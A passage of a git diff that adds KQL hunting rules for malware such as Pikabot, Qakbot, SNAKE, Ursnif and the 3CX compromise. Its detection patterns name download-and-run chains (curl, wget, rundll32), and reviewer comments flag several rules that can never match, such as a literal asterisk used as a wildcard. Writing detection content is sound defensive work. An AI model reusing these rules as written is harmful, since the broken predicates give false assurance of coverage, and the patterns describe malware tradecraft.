+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "\\1.dll, DllRegisterServer" or ProcessCommandLine endswith " 1.dll, DllRegisterServer") and FolderPath endswith "\\rundll32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Pikabot/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
new file mode 100644
index 00000000..2b2918a2
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Pikabot/pikabot_fake_dll_extension_execution_via_rundll32_exe.kql
@@ -0,0 +1,10 @@
+// Title: Pikabot Fake DLL Extension Execution Via Rundll32.EXE
+// Author: Swachchhanda Shrawan Poudel, Nasreddine Bencherchali (Nextron Systems)
+// Date: 2024-01-26
+// Level: high
+// Description: Detects specific process tree behavior linked to "rundll32" executions, wherein the associated DLL lacks a common ".dll" extension, often signaling potential Pikabot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains ":\\Windows\\Installer\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\regsvr32.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(((ProcessCommandLine contains ".cpl " or ProcessCommandLine contains ".cpl," or ProcessCommandLine contains ".dll " or ProcessCommandLine contains ".dll," or ProcessCommandLine contains ".inf " or ProcessCommandLine contains ".inf,") or (ProcessCommandLine endswith ".cpl" or ProcessCommandLine endswith ".cpl\"" or ProcessCommandLine endswith ".dll" or ProcessCommandLine endswith ".dll\"" or ProcessCommandLine endswith ".inf" or ProcessCommandLine endswith ".inf\"" or ProcessCommandLine endswith ".cpl'" or ProcessCommandLine endswith ".dll'" or ProcessCommandLine endswith ".inf'"))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_c2_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_c2_activity.kql
new file mode 100644
index 00000000..eb026653
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_c2_activity.kql
@@ -0,0 +1,13 @@
+// Title: Potential Pikabot C2 Activity
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-27
+// Level: high
+// Description: Detects the execution of rundll32 that leads to an external network connection.
+// The malware Pikabot has been seen to use this technique to initiate C2-communication through hard-coded Windows binaries.
+// MITRE Tactic: Command and Control
+// Tags: attack.command-and-control, attack.t1573, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceNetworkEvents
+| where (InitiatingProcessFolderPath endswith "\\SearchFilterHost.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe" or InitiatingProcessFolderPath endswith "\\sndvol.exe" or InitiatingProcessFolderPath endswith "\\wermgr.exe" or InitiatingProcessFolderPath endswith "\\wwahost.exe") and InitiatingProcessParentFileName =~ "rundll32.exe" and Protocol =~ "tcp"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_discovery_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_discovery_activity.kql
new file mode 100644
index 00000000..abe5ceb6
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_discovery_activity.kql
@@ -0,0 +1,13 @@
+// Title: Potential Pikabot Discovery Activity
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-27
+// Level: high
+// Description: Detects system discovery activity carried out by Pikabot, such as incl. network, user info and domain groups.
+// The malware Pikabot has been seen to use this technique as part of its C2-botnet registration with a short collection time frame (less than 1 minute).
+// MITRE Tactic: Discovery
+// Tags: attack.discovery, attack.t1016, attack.t1049, attack.t1087, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine in~ ("ipconfig.exe /all", "netstat.exe -aon", "whoami.exe /all")) and (InitiatingProcessParentFileName endswith "\\rundll32.exe" or (InitiatingProcessFolderPath endswith "\\SearchFilterHost.exe" or InitiatingProcessFolderPath endswith "\\SearchProtocolHost.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_hollowing_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_hollowing_activity.kql
new file mode 100644
index 00000000..4e73f2f9
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_hollowing_activity.kql
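Review bot: `InitiatingProcessParentFileName endswith "\\rundll32.exe"` cannot match, because `InitiatingProcessParentFileName` carries only the file name with no path, so the required leading backslash never appears and the first half of the parent condition is dead code; the C2 rule in the previous hunk compares the same column with `=~ "rundll32.exe"`, which is the form needed here. The exact `in~` match on `ipconfig.exe /all` and the two other strings is also brittle, since the recorded command line depends on how the process was invoked (`ipconfig /all` without the extension would be missed); matching the executable via `FolderPath` and the switch via `ProcessCommandLine has_any (...)` would be more robust.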
@@ -0,0 +1,13 @@
+// Title: Potential Pikabot Hollowing Activity
+// Author: Andreas Braathen (mnemonic.io)
+// Date: 2023-10-27
+// Level: high
+// Description: Detects the execution of rundll32 that leads to the invocation of legitimate Windows binaries.
+// The malware Pikabot has been seen to use this technique for process hollowing through hard-coded Windows binaries
+// MITRE Tactic: Privilege Escalation
+// Tags: attack.privilege-escalation, attack.defense-evasion, attack.t1055.012, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((FolderPath endswith "\\SearchFilterHost.exe" or FolderPath endswith "\\SearchProtocolHost.exe" or FolderPath endswith "\\sndvol.exe" or FolderPath endswith "\\wermgr.exe" or FolderPath endswith "\\wwahost.exe") and InitiatingProcessFolderPath endswith "\\rundll32.exe") and (not((FolderPath endswith "\\sndvol.exe" and InitiatingProcessCommandLine contains "mmsys.cpl")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql
new file mode 100644
index 00000000..9029f324
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Pikabot/potential_pikabot_infection_suspicious_command_combinations_via_cmd_exe.kql
@@ -0,0 +1,12 @@
+// Title: Potential Pikabot Infection - Suspicious Command Combinations Via Cmd.EXE
+// Author: Alejandro Houspanossian ('@lekz86')
+// Date: 2024-01-02
+// Level: medium
+// Description: Detects the execution of concatenated commands via "cmd.exe". Pikabot often executes a combination of multiple commands via the command handler "cmd /c" in order to download and execute additional payloads.
+// Commands such as "curl", "wget" in order to download extra payloads. "ping" and "timeout" are abused to introduce delays in the command execution and "Rundll32" is also used to execute malicious DLL files.
+// In the observed Pikabot infections, a combination of the commands described above are used to orchestrate the download and execution of malicious DLL files.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.command-and-control, attack.execution, attack.t1059.003, attack.t1105, attack.t1218, detection.emerging-threats
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "cmd" and ProcessCommandLine contains "/c") and (ProcessCommandLine contains " curl" or ProcessCommandLine contains " wget" or ProcessCommandLine contains " timeout " or ProcessCommandLine contains " ping ") and (ProcessCommandLine contains " rundll32" or ProcessCommandLine contains " mkdir ") and (ProcessCommandLine contains " & " or ProcessCommandLine contains " || ")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Qakbot/potential_qakbot_rundll32_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/potential_qakbot_rundll32_execution.kql
new file mode 100644
index 00000000..e0f01066
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Qakbot/potential_qakbot_rundll32_execution.kql
@@ -0,0 +1,12 @@
+// Title: Potential Qakbot Rundll32 Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-24
+// Level: high
+// Description: Detects specific process tree behavior of a "rundll32" execution often linked with potential Qakbot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains ".dll" and ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_regsvr32_calc_pattern.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_regsvr32_calc_pattern.kql
new file mode 100644
index 00000000..7161c835
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_regsvr32_calc_pattern.kql
@@ -0,0 +1,12 @@
+// Title: Qakbot Regsvr32 Calc Pattern
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-26
+// Level: high
+// Description: Detects a specific command line of "regsvr32" where the "calc" keyword is used in conjunction with the "/s" flag. This behavior is often seen used by Qakbot
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains " -s" or ProcessCommandLine contains " /s" or ProcessCommandLine contains " –s" or ProcessCommandLine contains " —s" or ProcessCommandLine contains " ―s") and ProcessCommandLine endswith " calc" and FolderPath endswith "\\regsvr32.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_exports_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_exports_execution.kql
new file mode 100644
index 00000000..ab910e2b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_exports_execution.kql
@@ -0,0 +1,12 @@
+// Title: Qakbot Rundll32 Exports Execution
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-05-24
+// Level: critical
+// Description: Detects specific process tree behavior of a "rundll32" execution with exports linked with Qakbot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine endswith "aslr" or ProcessCommandLine endswith "bind" or ProcessCommandLine endswith "DrawThemeIcon" or ProcessCommandLine endswith "GG10" or ProcessCommandLine endswith "GL70" or ProcessCommandLine endswith "jhbvygftr" or ProcessCommandLine endswith "kjhbhkjvydrt" or ProcessCommandLine endswith "LS88" or ProcessCommandLine endswith "Motd" or ProcessCommandLine endswith "N115" or ProcessCommandLine endswith "next" or ProcessCommandLine endswith "Nikn" or ProcessCommandLine endswith "print" or ProcessCommandLine endswith "qqqb" or ProcessCommandLine endswith "qqqq" or ProcessCommandLine endswith "RS32" or ProcessCommandLine endswith "Test" or ProcessCommandLine endswith "Time" or ProcessCommandLine endswith "Updt" or ProcessCommandLine endswith "vips" or ProcessCommandLine endswith "Wind" or ProcessCommandLine endswith "WW50" or ProcessCommandLine endswith "X555" or ProcessCommandLine endswith "XL55" or ProcessCommandLine endswith "xlAutoOpen" or ProcessCommandLine endswith "XS88") and ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_fake_dll_extension_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_fake_dll_extension_execution.kql
new file mode 100644
index 00000000..dc80e5ad
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_rundll32_fake_dll_extension_execution.kql
@@ -0,0 +1,12 @@
+// Title: Qakbot Rundll32 Fake DLL Extension Execution
+// Author: X__Junior (Nextron Systems), Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-24
+// Level: critical
+// Description: Detects specific process tree behavior of a "rundll32" execution where the DLL doesn't have the ".dll" extension. This is often linked with potential Qakbot activity.
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ((ProcessCommandLine contains ":\\ProgramData\\" or ProcessCommandLine contains ":\\Users\\Public\\" or ProcessCommandLine contains "\\AppData\\Local\\Temp\\" or ProcessCommandLine contains "\\AppData\\Roaming\\") and FolderPath endswith "\\rundll32.exe" and (InitiatingProcessFolderPath endswith "\\cmd.exe" or InitiatingProcessFolderPath endswith "\\cscript.exe" or InitiatingProcessFolderPath endswith "\\curl.exe" or InitiatingProcessFolderPath endswith "\\mshta.exe" or InitiatingProcessFolderPath endswith "\\powershell.exe" or InitiatingProcessFolderPath endswith "\\pwsh.exe" or InitiatingProcessFolderPath endswith "\\wscript.exe")) and (not(ProcessCommandLine contains ".dll"))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_uninstaller_execution.kql b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_uninstaller_execution.kql
new file mode 100644
index 00000000..f05ad122
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Qakbot/qakbot_uninstaller_execution.kql
@@ -0,0 +1,12 @@
+// Title: Qakbot Uninstaller Execution
+// Author: Florian Roth (Nextron Systems)
+// Date: 2023-08-31
+// Level: high
+// Description: Detects the execution of the Qakbot uninstaller file mentioned in the USAO-CDCA document on the disruption of the Qakbot malware and botnet
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where FolderPath endswith "\\QbotUninstall.exe" or (SHA256 startswith "423A9D13D410E2DC38EABB9FDF3121D2072472D0426260283A638B822DCD5180" or SHA256 startswith "559CAE635F0D870652B9482EF436B31D4BB1A5A0F51750836F328D749291D0B6" or SHA256 startswith "855EB5481F77DDE5AD8FA6E9D953D4AEBC280DDDF9461144B16ED62817CC5071" or SHA256 startswith "FAB408536AA37C4ABC8BE97AB9C1F86CB33B63923D423FDC2859EB9D63FA8EA0")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Rhadamanthys/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql b/KQL/rules-emerging-threats/2023/Malware/Rhadamanthys/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql
new file mode 100644
index 00000000..ac8f2aa7
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Rhadamanthys/rhadamanthys_stealer_module_launch_via_rundll32_exe.kql
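Review bot: The hash predicates in the Qakbot uninstaller rule are written as `SHA256 startswith "<full 64-hex digest>"`, which reads like a prefix search but, because the literal is already a complete SHA-256, can only succeed on an exact case-insensitive match. Stating the intent directly as `SHA256 in~ (...)` over the four digests is the idiomatic KQL form for an IOC list and makes it obvious to a reader that no partial-hash matching is going on. The same `startswith`-on-a-full-hash shape recurs in the 3CX DLL-load, 3CX execution and Lace Tempest loader hunks later in this commit, so it is most likely a converter mapping worth fixing once in helper.py rather than per rule.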
@@ -0,0 +1,10 @@
+// Title: Rhadamanthys Stealer Module Launch Via Rundll32.EXE
+// Author: TropChaud
+// Date: 2023-01-26
+// Level: medium
+// Description: Detects the use of Rundll32 to launch an NSIS module that serves as the main stealer capability of Rhadamanthys infostealer, as observed in reports and samples in early 2023
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, attack.t1218.011, detection.emerging-threats
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "nsis_uns" and ProcessCommandLine contains "PrintUIEntry" and (ProcessVersionInfoOriginalFileName =~ "RUNDLL32.EXE" or FolderPath endswith "\\rundll32.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Rorschach/rorschach_ransomware_execution_activity.kql b/KQL/rules-emerging-threats/2023/Malware/Rorschach/rorschach_ransomware_execution_activity.kql
new file mode 100644
index 00000000..667ac9f1
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Rorschach/rorschach_ransomware_execution_activity.kql
@@ -0,0 +1,12 @@
+// Title: Rorschach Ransomware Execution Activity
+// Author: X__Junior (Nextron Systems)
+// Date: 2023-04-04
+// Level: critical
+// Description: Detects Rorschach ransomware execution activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059.003, attack.t1059.001, attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine contains "11111111" and (FolderPath endswith "\\bcdedit.exe" or FolderPath endswith "\\net.exe" or FolderPath endswith "\\net1.exe" or FolderPath endswith "\\netsh.exe" or FolderPath endswith "\\wevtutil.exe" or FolderPath endswith "\\vssadmin.exe")
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_encrypted_registry_blob_related_to_snake_malware.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_encrypted_registry_blob_related_to_snake_malware.kql
new file mode 100644
index 00000000..1df0b250
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_encrypted_registry_blob_related_to_snake_malware.kql
@@ -0,0 +1,12 @@
+// Title: Potential Encrypted Registry Blob Related To SNAKE Malware
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: medium
+// Description: Detects the creation of a registry value in the ".wav\OpenWithProgIds" key with an uncommon name. This could be related to SNAKE Malware as reported by CISA
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+// False Positives:
+// - Some additional tuning might be required to tune out legitimate processes that write to this key by default
+
+DeviceRegistryEvents
+| where RegistryKey endswith "\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds*" and (not((RegistryKey endswith ".AssocFile.WAV" or RegistryKey contains ".wav.")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_binary_indicator.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_binary_indicator.kql
new file mode 100644
index 00000000..9791ec11
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_binary_indicator.kql
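Review bot: The trailing `*` in `RegistryKey endswith "\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds*"` is a literal character in KQL, not a wildcard, so `endswith` only matches keys whose name actually ends in an asterisk and this rule can never fire. The Sigma wildcard needs to be turned into a substring test, e.g. `RegistryKey contains "\\SOFTWARE\\Classes\\.wav\\OpenWithProgIds"`, which also makes the `.AssocFile.WAV` / `.wav.` exclusions that follow meaningful again. The description says it detects value creation but there is no `ActionType` filter, so as written it would also fire on deletes and renames once the predicate is fixed; adding `ActionType =~ "RegistryValueSet"` would match the stated intent, though confirm that against the upstream Sigma event category. Two other hunks in this commit carry the same literal asterisk through, so this looks like a converter gap in helper.py rather than a one-off.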
@@ -0,0 +1,12 @@
+// Title: Potential SNAKE Malware Installation Binary Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects a specific binary name seen used by SNAKE malware during its installation as described by CISA in their report
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (FolderPath endswith "\\jpsetup.exe" or FolderPath endswith "\\jpinst.exe") and (not((ProcessCommandLine =~ "" or (ProcessCommandLine in~ ("jpinst.exe", "jpinst", "jpsetup.exe", "jpsetup")) or isnull(ProcessCommandLine))))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_cli_arguments_indicator.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_cli_arguments_indicator.kql
new file mode 100644
index 00000000..821c449b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_installation_cli_arguments_indicator.kql
@@ -0,0 +1,12 @@
+// Title: Potential SNAKE Malware Installation CLI Arguments Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects a specific command line arguments sequence seen used by SNAKE malware during its installation as described by CISA in their report
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where ProcessCommandLine matches regex "\\s[a-fA-F0-9]{64}\\s[a-fA-F0-9]{16}"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_persistence_service_execution.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_persistence_service_execution.kql
new file mode 100644
index 00000000..7e3d7d4b
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/potential_snake_malware_persistence_service_execution.kql
@@ -0,0 +1,10 @@
+// Title: Potential SNAKE Malware Persistence Service Execution
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-04
+// Level: high
+// Description: Detects a specific child/parent process relationship indicative of a "WerFault" process running from the "WinSxS" as a service. This could be indicative of potential SNAKE malware activity as reported by CISA.
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceProcessEvents
+| where FolderPath endswith "\\WerFault.exe" and FolderPath startswith "C:\\Windows\\WinSxS\\" and InitiatingProcessFolderPath endswith "\\services.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_covert_store_registry_key.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_covert_store_registry_key.kql
new file mode 100644
index 00000000..76302e5e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_covert_store_registry_key.kql
@@ -0,0 +1,10 @@
+// Title: SNAKE Malware Covert Store Registry Key
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-11
+// Level: high
+// Description: Detects any registry event that targets the key 'SECURITY\Policy\Secrets\n' which is a key related to SNAKE malware as described by CISA
+// MITRE Tactic: Persistence
+// Tags: attack.persistence, detection.emerging-threats
+
+DeviceRegistryEvents
+| where RegistryKey endswith "SECURITY\\Policy\\Secrets\\n"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_installer_name_indicators.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_installer_name_indicators.kql
new file mode 100644
index 00000000..5ef1bece
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_installer_name_indicators.kql
@@ -0,0 +1,12 @@
+// Title: SNAKE Malware Installer Name Indicators
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: low
+// Description: Detects filename indicators associated with the SNAKE malware as reported by CISA in their report
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Some legitimate software was also seen using these names. Apply additional filters and use this rule as a hunting basis.
+
+DeviceFileEvents
+| where FolderPath endswith "\\jpsetup.exe" or FolderPath endswith "\\jpinst.exe"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_kernel_driver_file_indicator.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_kernel_driver_file_indicator.kql
new file mode 100644
index 00000000..64b7109e
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_kernel_driver_file_indicator.kql
@@ -0,0 +1,12 @@
+// Title: SNAKE Malware Kernel Driver File Indicator
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: critical
+// Description: Detects SNAKE malware kernel driver file indicator
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceFileEvents
+| where FolderPath =~ "C:\\Windows\\System32\\Com\\Comadmin.dat"
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_werfault_persistence_file_creation.kql b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_werfault_persistence_file_creation.kql
new file mode 100644
index 00000000..cc0b6221
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/SNAKE/snake_malware_werfault_persistence_file_creation.kql
@@ -0,0 +1,10 @@
+// Title: SNAKE Malware WerFault Persistence File Creation
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-05-10
+// Level: high
+// Description: Detects the creation of a file named "WerFault.exe" in the WinSxS directory by a non-system process, which can be indicative of potential SNAKE malware activity
+// MITRE Tactic: Execution
+// Tags: attack.execution, detection.emerging-threats
+
+DeviceFileEvents
+| where (FolderPath endswith "\\WerFault.exe" and FolderPath startswith "C:\\Windows\\WinSxS\\") and (not((InitiatingProcessFolderPath startswith "C:\\Windows\\System32\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\SysWOW64\\" or InitiatingProcessFolderPath startswith "C:\\Windows\\WinSxS\\")))
\ No newline at end of file
diff --git a/KQL/rules-emerging-threats/2023/Malware/Ursnif/ursnif_redirection_of_discovery_commands.kql b/KQL/rules-emerging-threats/2023/Malware/Ursnif/ursnif_redirection_of_discovery_commands.kql
new file mode 100644
index 00000000..4f32f675
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/Malware/Ursnif/ursnif_redirection_of_discovery_commands.kql
@@ -0,0 +1,12 @@
+// Title: Ursnif Redirection Of Discovery Commands
+// Author: @kostastsale
+// Date: 2023-07-16
+// Level: high
+// Description: Detects the redirection of Ursnif discovery commands as part of the initial execution of the malware.
+// MITRE Tactic: Execution
+// Tags: attack.execution, attack.t1059, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceProcessEvents
+| where (ProcessCommandLine contains "/C " and (ProcessCommandLine contains " >> " and ProcessCommandLine contains "\\AppData\\local\\temp*.bin")) and FolderPath endswith "\\cmd.exe" and InitiatingProcessFolderPath endswith "\\explorer.exe"
\ No newline at end of file
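Review bot: In the Ursnif rule, `ProcessCommandLine contains "\\AppData\\local\\temp*.bin"` carries the Sigma wildcard through as a literal `*`, so the predicate only matches a command line that literally contains `temp*.bin` and the rule is effectively dead. Express the wildcard as two substring tests, `ProcessCommandLine contains "\\AppData\\local\\temp" and ProcessCommandLine contains ".bin"`, which is how the surrounding `/C ` and ` >> ` conditions are already written; a `matches regex` form would be tighter on ordering but needs double-escaped backslashes and is easy to get wrong. The WerFault file-creation hunk sharing this line converts cleanly.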
diff --git a/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/malicious_dll_load_by_compromised_3cxdesktopapp.kql b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/malicious_dll_load_by_compromised_3cxdesktopapp.kql
new file mode 100644
index 00000000..1f4c3a8a
--- /dev/null
+++ b/KQL/rules-emerging-threats/2023/TA/3CX-Supply-Chain/malicious_dll_load_by_compromised_3cxdesktopapp.kql
@@ -0,0 +1,12 @@
+// Title: Malicious DLL Load By Compromised 3CXDesktopApp
+// Author: Nasreddine Bencherchali (Nextron Systems)
+// Date: 2023-03-31
+// Level: critical
+// Description: Detects DLL load activity of known compromised DLLs used in by the compromised 3CXDesktopApp
+// MITRE Tactic: Defense Evasion
+// Tags: attack.defense-evasion, detection.emerging-threats
+// False Positives:
+// - Unlikely
+
+DeviceImageLoadEvents
